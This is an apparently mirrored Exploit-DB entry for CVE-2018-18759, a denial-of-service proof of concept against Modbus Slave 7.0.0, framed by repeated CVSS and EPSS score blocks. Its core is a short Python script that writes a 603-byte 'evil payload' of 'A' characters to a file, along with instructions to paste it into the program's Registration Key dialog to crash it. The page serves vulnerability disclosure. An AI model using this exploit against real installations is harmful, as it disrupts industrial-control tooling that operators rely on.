Lucene search

Ihsan SencanEDB-ID:45732

HistoryOct 29, 2018 - 12:00 a.m.

Modbus Slave 7.0.0 - Denial of Service (PoC)

2018-10-2900:00:00

Ihsan Sencan

www.exploit-db.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.006 Low

EPSS

Percentile

78.9%

JSON

# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.modbustools.com/
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe
# Version: 7.0.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18759

# POC: 
# 1)
# F3 & Connection / Connect / Registration Key

#!/usr/bin/python

buffer = "A" * 603
try:
    f=open("sie.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.006 Low

EPSS

Percentile

78.9%

JSON

Related for EDB-ID:45732